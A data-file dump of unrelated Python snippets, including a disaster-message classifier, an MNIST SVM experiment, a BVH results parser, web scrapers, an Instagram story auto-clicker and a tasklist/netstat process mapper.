text
stringlengths 8
6.05M
|
|---|
from django.apps import AppConfig
class OrdersConfig(AppConfig):
name = 'trymake.apps.orders'
|
A='!'+'"#$%&'+"'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
x = A.find(input())
y = A.find(input())
print(A[x:y+1])
|
# import libraries
import sys
# Storage
import pandas as pd
from sqlalchemy import create_engine
# NLP
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.tokenize import word_tokenize
nltk.download('punkt')
nltk.download('stopwords')
nltk.download('wordnet')
# sklearn
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.multioutput import MultiOutputClassifier
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.metrics import classification_report, f1_score
from sklearn.externals import joblib
def load_data(database_filepath):
"""
Load data from SQLlite Database. Also remove columns with just one value
because this may crash the classifier.
Parameters:
-----------
database_filepath: path to SQLlite Database
Return value:
-------------
X: DataFrame with features
Y: DataFrame with targets
category_names: Names of the targets
"""
def drop_single_value_columns(data):
"""
Drop any column which doesn't contain two diffent values
Parameters:
-----------
data: DataFrame
Return value:
-------------
DataFrame with column(s) removed
"""
data.columns[data.nunique(axis=0) != 2]
data.drop(columns=data.columns[data.nunique(axis=0) != 2], inplace=True)
return data
engine = create_engine('sqlite:///' + database_filepath)
connection = engine.connect()
df = pd.read_sql_table("messages", con=connection)
X = df.iloc[:, 1]
Y = drop_single_value_columns(df.iloc[:, 4:])
category_names = list(Y.columns)
return X, Y, category_names
# That's a work around to because when defining stop_words inside of tokenize()
# I can only use n_jobs=1 in GridSearchCV. Otherwise I get the following error:
# _pickle.PicklingError: Could not pickle the task to send it to the workers.
stop_words = stopwords.words('english')
def tokenize(text):
"""
Tokenize text using word_tokenize and WordNetLemmatizer
Parameters:
-----------
text: String with feature_extraction
Return value:
-------------
List of tokenized text
"""
# normalize case and remove punctuation
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
# tokenize text
tokens = word_tokenize(text)
# lemmatize andremove stop words
# stop_words = stopwords.words("english")
lemmatizer = WordNetLemmatizer()
tokens = [lemmatizer.lemmatize(word) for word in tokens if word not in stop_words]
return tokens
def build_model():
"""
Building a pipeline to transform input data and classify with SVC
Return value:
-------------
Model for Cross-validation
"""
pipeline = Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer()),
('mcfl', MultiOutputClassifier(estimator=SVC()))
])
parameters = {
'mcfl__estimator__kernel' : ['linear', 'rbf'],
}
cv = GridSearchCV(pipeline, param_grid=parameters, verbose=10, cv=2, \
n_jobs=-1, scoring='f1_micro')
return cv
def evaluate_model(model, X_test, Y_test, category_names):
"""
Test model against test-data and print classification_report containing
precission, recall and f1-score for each category.
Parameters:
-----------
model: the model to be avaluated
X_test: input for testing
Y_test: true_values
category_names: list of names of categories
"""
Y_pred = model.predict(X_test)
print(classification_report(Y_test, Y_pred, target_names=category_names))
def save_model(model, model_filepath):
"""
Save best model to disk
Parameters:
-----------
model: GridSearchCV
model_filepath: Path for storage
"""
joblib.dump(model.best_estimator_, model_filepath, compress = 1)
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main()
|
def fib(n):
i=0
j=1
if n==1:
print("[0]")
elif n==2:
print("[0,1]")
else:
print("0")
print("1")
for c in range(n-2):
s=i+j
print(s)
i=j
j=s
x=int(input("enter the number of fib to generate"))
fib(x)
|
#!/usr/bin/env python3.7
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 28 12:49:03 2020
@author: ejreidelbach
:DESCRIPTION: This script scrapes data from the results of the Eagle
Dynamics' 2020 F-18 roadmap survey for further analysis.
Actual survey link: https://docs.google.com/forms/d/e/1FAIpQLSfKuQ53phRBCLQT03QFLX18UcA2UiibvZO6uvGeosGRPhpYrg/viewanalytics
:REQUIRES:
- Refer to the Package Import section of the script
:NOTES:
NOTE 1: For the Selenium driver to function properly on Ubuntu, I had to
download the most up-to-date geckodriver found at:
https://github.com/mozilla/geckodriver/releases
Once that is complete, extract the driver and place it in the
/us/local/bin folder
NOTE 2: An effective selenium guide can be found here:
https://automatetheboringstuff.com/chapter11/
The relevant contents begin roughly 3/4 down the page.
:TODO: N/A
"""
#==============================================================================
# Package Import
#==============================================================================import os
import pandas as pd
import pathlib
import time
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
#==============================================================================
# Functions
#==============================================================================
def scrape_f18_poll():
'''
Purpose: Scrapes the questions and results for every poll question in the
Eagle Dynamics F-18 Road Map Survey.
Inputs
------
NONE
Outputs
-------
df_poll : Pandas DataFrame
Contains the latest survey results in a tabular format
'''
# set the url to the F18 survey site
url = 'https://docs.google.com/forms/d/e/1FAIpQLSfKuQ53phRBCLQT03QFLX18UcA2UiibvZO6uvGeosGRPhpYrg/viewanalytics'
# initialize the geckodriver
options = Options()
options.headless = True
driver = webdriver.Chrome(executable_path=r'C:\Users\reideej1\Projects\chromedriver.exe',
options=options)
# Scrape the page
driver.get(url)
# Parse the new request with BeautifulSoup
html = driver.page_source
soup = BeautifulSoup(html, "html.parser")
driver.quit()
# Extract the question in the poll
html_poll = soup.find('div', {'jsname':'cAPHHf'})
html_questions = html_poll.find_all('span',{'class':'freebirdAnalyticsViewQuestionTitle'})
list_questions = [x.text for x in html_questions]
# Extract the results for each poll question
html_results = html_poll.find_all('div',{'aria-label':'A tabular representation of the data in the chart.'})
list_results = [pd.read_html(str(x.find('table')))[0].set_index(
'Unnamed: 0').T.to_dict('records')[0] for x in html_results]
# merge all results into a dataframe
df_poll = pd.DataFrame()
col_count = 0
for question, result in zip(list_questions, list_results):
# initialize dataframe
if col_count == 0:
df_poll = pd.DataFrame.from_dict(result, orient='index')
df_poll.columns = [question]
# insert column into master dataframe
else:
df_poll.insert(col_count,question, result.values(), True)
col_count = col_count + 1
# reset the df index and save the votes column
df_poll = df_poll.reset_index().rename(columns={'index':'vote'})
# create a timestamp for naming purposes when writing to disk
timestamp = time.strftime('%d_%m_%Y_%H_%M_%S')
# set the output directory
path_output = pathlib.Path(r'C:\Users\reideej1\Projects\dcs\data')
# write the file to disk
df_poll.to_csv(f'{path_output}\poll_results_{timestamp}.csv', index = False)
return df_poll
|
import os.path
import math
from os import path
allNames =[
"lizard",
"shiftHappens",
"erato",
"cubes",
"sponza",
"daviaRock",
"rungholt",
"breakfast",
"sanMiguel",
"amazonLumberyardInterior",
"amazonLumberyardExterior",
"amazonLumberyardCombinedExterior",
"gallery",
]
def fixNone(value):
#this converts None to 0 (only used for output)
if (value == None):
return 0
return value
class sceneContainer:
def __init__(self):
self.sceneNameId = 0
self.sceneName = ""
self.subdivisions = []
class storageType:
def __init__(self, subdivision, branch, leaf, listOfVariableCounts):
self.branch = branch
self.leaf = leaf
self.subdivision = subdivision
#names of variables like node Intersection count
self.variableValues = [None for _ in range(listOfVariableCounts[0])]
#names of normalized variables like wasteFactor
self.normalizedVariableValues = [None for _ in range(listOfVariableCounts[1])]
#Variables that are multiplied cachline they use
self.variableNodeCachelinesValues = [None for _ in range(listOfVariableCounts[2])]
self.totalTime = None
self.nodeTime = None
self.leafTime = None
class everything:
def __init__(self, wide):
#the folder all the scene folders are in: (leave empty if no folder)
#self.folder = "ResultsStorage/Data/IntersectionResults/"
#self.outputFolder = "Summary/"
#self.folder = "ResultsStorage/Data/AllIntersections/"
self.folder = "ResultsStorage/Data/AllIntersectionsNoSplit/"
self.outputFolder = "Summary/tmp/"
#names of the sceneFolders
self.names = [4,8,9,10,12]
#self.names = [4]
#prefixTo the folderNames like this "_4To16"
#self.prefix = "_4To16"
self.prefix = ""
#Prefix to the output txt (so its sceneNamePrefix.txt)
self.outputPrefix = ""
self.workGroupSize = 16
#Version -1 = not wide, 0 = old version, 1 = new version
self.wide = wide
if self.wide:
self.intermediateFolderName = "WorkGroupSize_" + str(self.workGroupSize) + "_Wide/"
else:
self.intermediateFolderName = "WorkGroupSize_" + str(self.workGroupSize) + "_Normal/"
# -1 for all, id otherwise (starting with 0)
self.singeIdOverride = -1
#maximum branchingfactor and max leafsite
self.minBranchingFactor = 2
self.maxBranchingFactor = 16
self.minLeafSize = 1
self.maxLeafSize = 16
self.branchStep = 1
self.leafStep = 1
#number of subdivisions we test:
self.subdivisionRange = [0, 0]
self.subdivisionCount = self.subdivisionRange[1] - self.subdivisionRange[0] + 1
# 0 = avx, sse = 1
self.gangType = 1
self.gangName = ["Avx", "Sse"]
#temprary cost function.
self.nodeCostFactor = 1
self.leafCostFactor = 1
self.cachelineSize = 128
#names of variables like node Intersection count
self.variableNames = [
"primary intersections node:",
"primary intersections leaf:",
"primary aabb intersections:",
"primary aabb success ration:",
"primary primitive intersections:",
"primary primitive success ratio:",
"secondary intersections node:",
"secondary intersections leaf:",
"secondary aabb intersections:",
"secondary aabb success ration:",
"secondary primitive intersections:",
"secondary primitive success ratio:",
"sah of node:",
"sah of leaf:",
"end point overlap of node:",
"end point overlap of leaf:",
"volume of leafs:",
"surface area of leafs:",
"average child fullness:",
"average leaf fullness:",
"average bvh node fullness:",
"average bvh leaf fullness:",
"number of nodes:",
"number of leafnodes:",
"average leaf depth:",
"tree depth:",
]
self.variableOutputNames = [
"primaryNodeIntersections",
"primaryLeafIntersections",
"primaryAabb",
"primaryAabbSuccessRatio",
"primaryPrimitive",
"primaryPrimitiveSuccessRatio",
"secondaryNodeIntersections",
"secondaryLeafIntersections",
"secondaryAabb",
"secondaryAabbSuccessRatio",
"secondaryPrimitive",
"secondaryPrimitiveSuccessRatio",
"nodeSah",
"leafSah",
"nodeEpo",
"leafEpo",
"leafVolume",
"leafSurfaceArea",
"traversalNodeFullness",
"traversalLeafFullness",
"BVHNodeFullness",
"BVHLeafFullness",
"nodeCount",
"leafCount",
"averageLeafDepth",
"treeDepth",
]
#names of normalized variables like wasteFactor
self.normalizedVariableNames = [
"primary waste factor:",
"secondary waste factor:"
]
self.normalizedVariableOutputNames = [
"primaryWasteFactor",
"secondaryWasteFactor"
]
#Variables that are multiplied cachline they use
self.variableNodeCachelinesNames = [
"primary intersections node:",
"secondary intersections node:"
]
self.variableNodeCachelinesOutputNames = [
"primaryNodeCachelines",
"secondaryNodeCachelines"
]
#fullness would be some special thing becuase its divided by leafsize
# -> could do variables divided by leafsize and ones divided by branchFactor
# -> and ones multiplied by it?
#initialize storage
self.storage = [None for _ in range(len(self.names))]
#folder to the performance files. For now its the laptop per files
self.perfFolder = "ResultsStorage/Data/PerfResult1/"
self.listVariableCount = [len(self.variableNames), len(self.normalizedVariableNames), len(self.variableNodeCachelinesNames)]
if not os.path.exists(self.outputFolder):
os.makedirs(self.outputFolder)
def run(self):
# now loop over all scenes to do the single scene file (and collect min max)
# then loop over all and get averages
firstLine = "branchFactor, leafSize, subdivision"
for name in self.variableOutputNames:
firstLine += ", " + name
for name in self.normalizedVariableOutputNames:
firstLine += ", " + name
for name in self.variableNodeCachelinesOutputNames:
firstLine += ", " + name
firstLine += ", totalTime, nodeTime, leafTime, perAabbCost, perTriCost, sahNodeFactor"
for loopId, nameId in enumerate(self.names):
self.storage[loopId] = sceneContainer()
self.storage[loopId].sceneName = allNames[nameId]
self.storage[loopId].sceneNameId = nameId
self.storage[loopId].subdivisions = [[] for _ in range(self.subdivisionCount)]
#averageStorage = [[] for _ in range(self.subdivisionCount)]
for loopId, nameId in enumerate(self.names):
name = allNames[nameId]
for s in range(self.subdivisionRange[1] - self.subdivisionRange[0] + 1):
for b in range(0, self.maxBranchingFactor -(self.minBranchingFactor - 1), self.branchStep):
for l in range(0, self.maxLeafSize - (self.minLeafSize - 1), self.leafStep):
branch = b + self.minBranchingFactor
leaf = l + self.minLeafSize
storagePerSubdivision = storageType(s, branch, leaf, self.listVariableCount)
if(self.subdivisionRange[1] == 0):
fileName = self.folder + name + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_Info.txt"
fileName2 = self.folder + name + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_BVHInfo.txt"
fileName3 = self.perfFolder + name + self.gangName[self.gangType] +"Perf" + self.prefix + "/" + self.intermediateFolderName + name + "_b" + str(branch) + "_l" + str(leaf) + "_mb" + str(branch) + "_ml" + str(leaf) + "_Perf.txt"
else:
fileName = self.folder + name + "Sub" + str(s) + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_Info.txt"
fileName2 = self.folder + name + "Sub" + str(s) + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_BVHInfo.txt"
fileName3 = self.perfFolder + name + self.gangName[self.gangType] +"Perf" + "Sub" + str(s) + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_mb" + str(branch) + "_ml" + str(leaf) + "_Perf.txt"
anyFileExists = False
if (path.exists(fileName)):
#open file and read important values
f = open(fileName, "r")
if f.mode == 'r':
self.gatherAll(storagePerSubdivision, f)
anyFileExists = True
if (path.exists(fileName2)):
#open file and read important values
f = open(fileName2, "r")
if f.mode == 'r':
self.gatherAll(storagePerSubdivision, f)
anyFileExists = True
if (path.exists(fileName3)):
#open file and read important values
f = open(fileName3, "r")
if f.mode == 'r':
self.gatherPerf(storagePerSubdivision, f)
anyFileExists = True
if anyFileExists:
self.storage[loopId].subdivisions[s].append(storagePerSubdivision)
#remove all empty fields (due to scenes with different max subdivision)
for scenes in self.storage:
for sub in reversed(range(self.subdivisionCount)):
if (len(scenes.subdivisions[sub]) == 0):
scenes.subdivisions.pop(sub)
#loop over storage and do output
for scenes in self.storage:
#create file if i want one file for all subs
name = scenes.sceneName
if self.wide:
wideString = "_Wide"
else:
wideString = "_Normal"
#output file:
if(self.subdivisionRange[1] == 0):
fResult = open(self.outputFolder + name + self.prefix + "Table" + self.outputPrefix + wideString +".txt", "w+")
else:
fResult = open(self.outputFolder + name + "Sub" + self.prefix + "Table" + self.outputPrefix + wideString + ".txt", "w+")
fResult.write(firstLine + "\n")
for subId, sub in enumerate(scenes.subdivisions):
for configStorage in sub:
#empty line for table with space if branching factor changes
#write results
line = self.makeLine([configStorage.branch, configStorage.leaf, configStorage.subdivision])
line += ", " + self.makeLine(configStorage.variableValues)
line += ", " + self.makeLine(configStorage.normalizedVariableValues)
line += ", " + self.makeLine(configStorage.variableNodeCachelinesValues)
sahNodeFactor , nodeCost, leafCost = None, None, None
if configStorage.totalTime != None and configStorage.variableValues[0] != None:
#i calculate the cost for one node intersection and for one leaf intersection
nodeCost = configStorage.nodeTime / (configStorage.variableValues[0] + configStorage.variableValues[2])
leafCost = configStorage.leafTime / (configStorage.variableValues[1] + configStorage.variableValues[3])
if(leafCost != 0):
sahNodeFactor = nodeCost / leafCost
line += ", " + self.makeLine([fixNone(configStorage.totalTime), fixNone(configStorage.nodeTime), fixNone(configStorage.leafTime), fixNone(nodeCost), fixNone(leafCost), fixNone(sahNodeFactor)])
fResult.write(line + "\n")
fResult.close()
#one for each subdivision and one for each branc / leafsize combination
#the more im thinking about it, average isnt that usefull
#averageStorage = [[] for _ in range(self.subdivisionCount)]
#average
#sceneCount = len(self.names)
#if sceneCount > 1:
#fResult = open("AverageTableWithSpace.txt")
#fResult2 = open("AverageTable.txt")
def makeLine(self, array):
line = "" + str(array[0])
for element in array[1:]:
line += ", " + str(element)
return line
def gatherAll(self, subStorage, file):
for vId, keyToMatch in enumerate(self.variableNames):
anyHit = False
file.seek(0)
for line in file:
hit, value = self.gatherVariable(keyToMatch, line)
if hit:
if anyHit:
print("ERROR: variable was found twice")
anyHit = True
subStorage.variableValues[vId] = value
for vId, keyToMatch in enumerate(self.normalizedVariableNames):
anyHit = False
file.seek(0)
for line in file:
hit, value = self.gatherVariable(keyToMatch, line)
if hit:
if anyHit:
print("ERROR: normalized variable was found twice")
anyHit = True
subStorage.normalizedVariableValues[vId] = value
for vId, keyToMatch in enumerate(self.variableNodeCachelinesNames):
anyHit = False
file.seek(0)
for line in file:
hit, value = self.gatherNodeCachelineVariable(keyToMatch, line, subStorage.branch)
if hit:
if anyHit:
print("ERROR: cacheline variable was found twice")
anyHit = True
subStorage.variableNodeCachelinesValues[vId] = value
def gatherPerf(self, subStorage, file):
anyHit = False
file.seek(0)
for line in file:
hit, value = self.gatherVariable("Raytracer total time:", line)
if hit:
if anyHit:
print("ERROR: total time was found twice")
anyHit = True
subStorage.totalTime = value
anyHit = False
file.seek(0)
for line in file:
hit, value = self.gatherVariable("Time all rays(sum) - triangle(sum):", line)
if hit:
if anyHit:
print("ERROR: node time was found twice")
anyHit = True
subStorage.nodeTime = value
anyHit = False
file.seek(0)
for line in file:
hit, value = self.gatherVariable("Time for triangle intersections (SUM):", line)
if hit:
if anyHit:
print("ERROR: leaf time was found twice")
anyHit = True
subStorage.leafTime = value
def gatherVariable(self, keyToMatch, string):
if(string.find(keyToMatch) != -1):
for t in string.split():
try:
value = float(t)
return True, value
#only take first value (second one might be average)
break
except ValueError:
pass
return False, 0
def gatherNodeCachelineVariable(self, keyToMatch, string, branch):
if(string.find(keyToMatch) != -1):
for t in string.split():
try:
byteNeeded = branch * 32
factor = byteNeeded / self.cachelineSize
value = float(t) * math.ceil(factor)
return True, value
#only take first value (second one might be average)
break
except ValueError:
pass
return False, 0
e = everything(wide = True)
e.run()
e = everything(wide = False)
e.run()
|
'''
summary
가장 멀리 떨어진 노드 개수 출력
params
vn=6
: 6개의 v
es=[[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]
: 각 es
output
3 : 1번 노드에서 가장 멀리 떨어진 v는 3개
strategy
한 v에서 여러 v로
무방향, 가중치X
bfs로 depth 기록하면서 가장 멀리 떨어진 노드 보면 될듯!
'''
from collections import deque
def solution(vn, es):
graph = [[] for _ in range(vn+1)]
depth_t = [-1]*(vn+1)
for e in es:
graph[e[0]].append(e[1])
graph[e[1]].append(e[0])
q = deque([1])
depth_t[1] = 0 # 1번 v의 depth는 0
while q:
v = q.popleft()
for adj_v in graph[v]:
if depth_t[adj_v] == -1:
q.append(adj_v)
depth_t[adj_v] = depth_t[v] + 1
return depth_t.count(max(depth_t))
print(solution(6, [[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]))
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from bs4 import BeautifulSoup as b
import time
import sys
username= #username
password= #password
chrome_browser = webdriver.Chrome('./chromedriver')
chrome_browser.maximize_window()
print('loggin in')
chrome_browser.get('https://www.instagram.com/accounts/login/?source=auth_switcher')
uid = WebDriverWait(chrome_browser, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '#react-root > section > main > div > article > div > div:nth-child(1) > div > form > div:nth-child(2) > div > label > input')))
uid.click()
uid.send_keys(username)
pswd = chrome_browser.find_element_by_css_selector('#react-root > section > main > div > article > div > div:nth-child(1) > div > form > div:nth-child(3) > div > label > input')
pswd.click()
pswd.send_keys(password)
btn = chrome_browser.find_element_by_css_selector('#react-root > section > main > div > article > div > div:nth-child(1) > div > form > div:nth-child(4)')
btn.click()
time.sleep(5)
print('getting homepage')
chrome_browser.get('https://www.instagram.com/')
try:
not_now=WebDriverWait(chrome_browser, 10). until(EC.presence_of_element_located((By.XPATH, '/html/body/div[4]/div/div/div/div[3]/button[2]')))
not_now.click()
except:
pass
print('getting stories')
first_story=WebDriverWait(chrome_browser, 10). until(EC.presence_of_element_located((By.XPATH, '/html/body/div[1]/section/main/section/div/div[1]/div/div/div/div/ul/li[4]/div/button')))
first_story.click()
time.sleep(5)
print('clicking next')
clickC=0
errorC=0
errorL=[]
for i in range(300):
try:
next_button=WebDriverWait(chrome_browser, 10). until(EC.presence_of_element_located((By.XPATH, '/html/body/div[1]/section/div/div/section/div[2]/button[2]')))
next_button.click()
clickC+=1
except:
errorC+=1
errorL.append(sys.exc_info()[0])
print(f'clicked next on {clickC} stories')
print(f'{errorC} errors occurred')
|
import pickle
import sklearn
from sklearn import svm # this is an example of using SVM
from mnist import load_mnist
import matplotlib.pyplot as plt
import numpy as np
#fairtraintest return Training and Testing Arrays of size trainsize and testsize (x28x28)
#it selects example so as to have an equal distribution of each label - You can also put 0 for testsize or trainsize, and then it just returns an equal distribution of labels
def fairtraintest(images, labels, trainsize, testsize):
if len(images) < trainsize + testsize:
print "error: cannot divide images without repeats"
return False
else:
indexes = np.arange(len(images))
np.random.shuffle(indexes) #randomize data selected
done = False
doneTest = np.zeros(10, dtype=bool)
Testcounts = np.zeros(10)
Testtotalcount = 0
TestingSet = np.zeros((testsize, 784))
TestingLabels = np.zeros(testsize)
if(testsize == 0):
doneTest = np.ones(10, dtype=bool)
doneTraining = np.zeros(10, dtype=bool)
Traincounts = np.zeros(10)
Traintotalcount = 0
TrainingSet = np.zeros((trainsize, 784))
TrainLabels = np.zeros(trainsize)
if(trainsize == 0):
doneTraining = np.ones(10, dtype=bool)
count = 0
while done == False:
label = labels[indexes[count]]
if doneTest[label] == False and Testtotalcount < testsize and testsize > 0:
TestingSet[Testtotalcount] = images[indexes[count]]
TestingLabels[Testtotalcount] = label
Testtotalcount += 1
Testcounts[label] += 1
if Testcounts[label] >= (testsize/10):
doneTest[label] = True
elif doneTraining[label] == False and Traintotalcount < trainsize and trainsize > 0:
TrainingSet[Traintotalcount] = images[indexes[count]]
TrainLabels[Traintotalcount] = label
Traintotalcount += 1
Traincounts[label] += 1
if Traincounts[label] >= (trainsize/10):
doneTraining[label] = True
if np.all(doneTest) and np.all(doneTraining):
done = True
count += 1
if count == len(images):
done = True
return TrainingSet, TrainLabels, TestingSet, TestingLabels
def preprocess(images):
return [i.flatten() for i in images]
#this function is suggested to help build your classifier.
#You might want to do something with the images before
#handing them to the classifier. Right now it does nothing.
##we need to normalize the images
#No need for preprocess on SVM as we use gradient
def custom_build_classifier(images, labels, c, deg, poly):
#this will actually build the classifier. In general, it
#will call something from sklearn to build it, and it must
#return the output of sklearn. Right now it does nothing.
if poly == 1:
classifier = svm.SVC(C=c, degree=deg, kernel='poly')
classifier.fit(images, labels)
else:
classifier = svm.SVC(C=c, degree=deg)
classifier.fit(images, labels)
return classifier
def build_classifier(images, labels):
#this will actually build the classifier. In general, it
#will call something from sklearn to build it, and it must
#return the output of sklearn. Right now it does nothing.
classifier = svm.SVC(C=50, degree=2, kernel='poly')
classifier.fit(images, labels)
return classifier
##the functions below are required
def save_classifier(classifier, training_set, training_labels):
#this saves the classifier to a file "classifier" that we will
#load from. It also saves the data that the classifier was trained on.
import pickle
pickle.dump(classifier, open('classifier_1.p', 'w'))
def classify(images, classifier):
#runs the classifier on a set of images.
return classifier.predict(images)
def error_measure(predicted, actual):
return np.count_nonzero(abs(predicted - actual))/float(len(predicted))
def fivefoldsize(images, labels, C, degree, poly):
Imgslices = [images[j::5] for j in xrange(5)] #slices both our X and Y into n parts
Labelslices = [labels[l::5] for l in xrange(5)]
Error = np.zeros(5) #array of errors to collect after each fold
for i in xrange(0, 5):
Imgtraining = np.array(Imgslices[:i] + Imgslices[(i+1):]) #get the training sets by exluding one of the slices
Labeltraining = np.array(Labelslices[:i] + Labelslices[(i+1):])
Imgtraining.flatten() #formatting
Labeltraining.flatten()
print "fold: " + str(i)
print "training classifier"
ConcatenatedImages = np.concatenate((Imgtraining[0], Imgtraining[1], Imgtraining[2], Imgtraining[3]))
ConcatenatedLabels = np.concatenate((Labeltraining[0], Labeltraining[1], Labeltraining[2], Labeltraining[3]))
classifier = custom_build_classifier(ConcatenatedImages, ConcatenatedLabels, C, degree, poly)
predicted = classify(Imgslices[i], classifier)
error = error_measure(predicted, Labelslices[i])
print "Error at fold " + str(i) + " : " + str(error)
Error[i] = error
return np.average(Error)
def TrainingSizeFold(images, labels):
TrainingSizes = [1000, 2000, 4000, 10000]
SizeE = np.zeros(len(TrainingSizes))
for i in xrange(0, len(TrainingSizes)):
print "Training on: " + str(TrainingSizes[i])
newimages, newlabels, temp, temp2 = fairtraintest(images, labels, TrainingSizes[i], 0)
#print len(newimages)
#print len(newlabels)
SizeE[i] = fivefoldsize(newimages, newlabels, 1.0, 3, -1)
print "Avg Error at training size: " + str(SizeE[i])
print SizeE[i]
np.savetxt('SizeAnalysisSVM.txt', SizeE, delimiter=',')
def TrainingCFold(images, labels):
TrainingCvalues = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1, 1.25, 1.5, 1.75, 2, 3, 4, 5, 6, 7, 8, 9, 10]
SizeE = np.zeros(len(TrainingCvalues))
for i in xrange(0, len(TrainingCvalues)):
print "Training on: c = " + str(TrainingCvalues[i])
SizeE[i] = fivefoldsize(SelectedImages, SelectedLabels, TrainingCvalues[i], 3.0, -1)
print "Avg Error at training size: " + str(SizeE[i])
print SizeE[i]
np.savetxt('CAnalysisSVM.txt', SizeE, delimiter=',')
def TrainingPolyFold(images, labels):
TrainingPolyvalues = [0,1,2,3]
SizeE = np.zeros(len(TrainingPolyvalues))
for i in xrange(0, len(TrainingPolyvalues)):
print "Training on: degree = " + str(i)
SizeE[i] = fivefoldsize(SelectedImages, SelectedLabels, 50, i, 1)
print "Avg Error at training size: " + str(SizeE[i])
print SizeE[i]
np.savetxt('PolyAnalysisSVM.txt', SizeE, delimiter=',')
def buildConfusionMatrix(predicted, actual):
matrix = np.zeros((10,10))
for i in xrange(0,len(predicted)):
matrix[actual[i]][predicted[i]] += 1
return matrix
def fivefoldconfusion(images, labels, C, degree, poly):
Imgslices = [images[j::5] for j in xrange(5)] #slices both our X and Y into n parts
Labelslices = [labels[l::5] for l in xrange(5)]
Error = np.zeros(5) #array of errors to collect after each fold
myConfusionMatrixes = np.zeros((5,10,10))
for i in xrange(0, 5):
Imgtraining = np.array(Imgslices[:i] + Imgslices[(i+1):]) #get the training sets by exluding one of the slices
Labeltraining = np.array(Labelslices[:i] + Labelslices[(i+1):])
Imgtraining.flatten() #formatting
Labeltraining.flatten()
print "fold: " + str(i)
print "training classifier"
ConcatenatedImages = np.concatenate((Imgtraining[0], Imgtraining[1], Imgtraining[2], Imgtraining[3]))
ConcatenatedLabels = np.concatenate((Labeltraining[0], Labeltraining[1], Labeltraining[2], Labeltraining[3]))
classifier = custom_build_classifier(ConcatenatedImages, ConcatenatedLabels, C, degree, poly)
predicted = classify(Imgslices[i], classifier)
error = error_measure(predicted, Labelslices[i])
print "Error at fold " + str(i) + " : " + str(error)
myConfusionMatrixes[i] = buildConfusionMatrix(predicted, Labelslices[i])
#print myConfusionMatrixes[i]
for k in xrange(0, len(predicted)):
if(predicted[k] != Labelslices[i][k]):
print "predicted: " + str(predicted[k])
print "actual: " + str(Labelslices[i][k])
plt.imshow(np.reshape(Imgslices[i][k], (28, 28)), cmap = 'binary', interpolation='nearest')
plt.show()
if __name__ == "__main__":
# Code for loading data
images, labels = load_mnist(digits=range(0,10), path = '.')
#preprocessing
#No preprocessing as SVM performs better with scaled weights
images = preprocess(images)
#Training on different Sizes - ANALYSIS:
#TrainingSizeFold(images, labels)
#picking training and testing set for optimizing SVM
SelectedImages, SelectedLabels, TestingSet, TestingLabels = fairtraintest(images, labels, 8000, 2000)
#import pickle
#pickle.dump(SelectedImages, open('training_set_1.p', 'w'))
#pickle.dump(SelectedLabels, open('training_labels_1.p', 'w'))
#SelectedImages = pickle.load(open('training_set_1.p'))
#SelectedLabels = pickle.load(open('training_labels_1.p'))
#Training on C coefficient
#TrainingCFold(SelectedImages, SelectedLabels)
#Training on Poly Coefs
#TrainingPolyFold(SelectedImages, SelectedLabels)
#optimized classifier (from what we learnt in 5-fold):
#fivefoldconfusion(SelectedImages, SelectedLabels, 50, 2, 1)
#Error = fivefoldsize(SelectedImages, SelectedLabels, , 3)
#classifier = custom_build_classifier(SelectedImages, SelectedLabels, 50, 2, 1)
#save_classifier(classifier, images, labels)
classifier = build_classifier(SelectedImages, SelectedLabels)
save_classifier(classifier, SelectedImages, SelectedLabels)
classifier = pickle.load(open('classifier_1.p'))
predicted = classify(TestingSet, classifier)
print error_measure(predicted, TestingLabels)
|
import subprocess
# Tasklist command
cmd_tasklist = ["tasklist"]
process = subprocess.Popen(cmd_tasklist, stdout=subprocess.PIPE)
pid_col = 1
name_col = 0
name_list = {}
# Invoking tasklist command
print "=> invoking tasklist command"
for line in process.stdout.readlines():
list = line.split(" ")
filtered = filter(None,list)
if len(filtered) > 2:
name_list[filtered[pid_col]] = filtered[name_col]
# Invoking Netstat command
print "==> invoking netstat command"
cmd_netstat = ["netstat", "-ano"]
process = subprocess.Popen(cmd_netstat, stdout=subprocess.PIPE)
network_list = []
netstat_loc_addr_col = 1
netstat_for_addr_col = 2
netstat_state_col = 3
netstat_pid_col = 4
output_file_name = "netstat_output.txt"
# merging Image Name for PID and Netstat output
print "===> processing output"
start_recording = False
for line in process.stdout.readlines():
list = line.split(" ")
filtered = filter(None,list)
# if start_recording:
# network_list.append(filtered)
if "TCP" in filtered[0]:
# start_recording = True
network_list.append(filtered)
